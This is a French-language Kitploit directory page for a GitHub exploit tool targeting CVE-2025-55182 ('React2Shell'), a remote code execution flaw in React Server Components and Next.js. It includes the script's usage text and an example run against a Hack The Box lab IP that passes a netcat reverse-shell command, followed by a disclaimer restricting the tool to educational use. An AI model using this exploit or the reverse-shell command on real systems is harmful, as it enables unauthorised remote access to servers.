Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-React2Shell — Exploit CVE-2025-55182 | par infrar3d | Kitploit
Outils/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2025-55182-react2shell
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubindustri4l-h3ll-xpl0it3rs/cve-2025-55182-react2shell

CVE-2025-55182-React2Shell

Exploit CVE-2025-55182 | par infrar3d

Voir le dépôt
4il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182-React2Shell

Exploité par infrar3d

Une vulnérabilité critique de sévérité 10.0 affectant l'utilisation côté serveur de React.js, suivie sous la référence CVE-2025-55182 dans React.js et CVE-2025-66478 spécifiquement pour le framework Next.js.

Cette vulnérabilité a été divulguée de manière responsable par Lachlan Davidson le 29 novembre 2025 PT à l'équipe Meta. La divulgation initiale et la publication du correctif ont été effectuées par React et Vercel le 3 décembre 2025 PT. (Original : https://react2shell.com/)

Utilisation :

python3 CVE-2025-55182.py --help 
usage: python CVE-2025-55182.py -u <URL> [-c COMMAND]

CVE-2025-55182 - React Server Components RCE Exploit

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL (required)
  -c, --command COMMAND
                        Command to execute on target (default: id)

Example: python CVE-2025-55182.py -u http://target.com -c "whoami"


Exemple (testé sur une tâche HTB) :

python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"

⚠️ Avertissement ⚠️

Ce logiciel et ce code de preuve de concept sont fournis uniquement à des fins éducatives et de recherche.

  • Les auteurs ne sont pas responsables de tout usage abusif ou dommage causé par ce programme.
  • Ne pas utiliser contre des systèmes sans autorisation préalable explicite.
  • L'utilisation de cet outil pour attaquer des cibles sans consentement est illégale.

Vous êtes responsable du respect de toutes les lois applicables. Utilisez-le de manière éthique et responsable.

Télécharger l’outil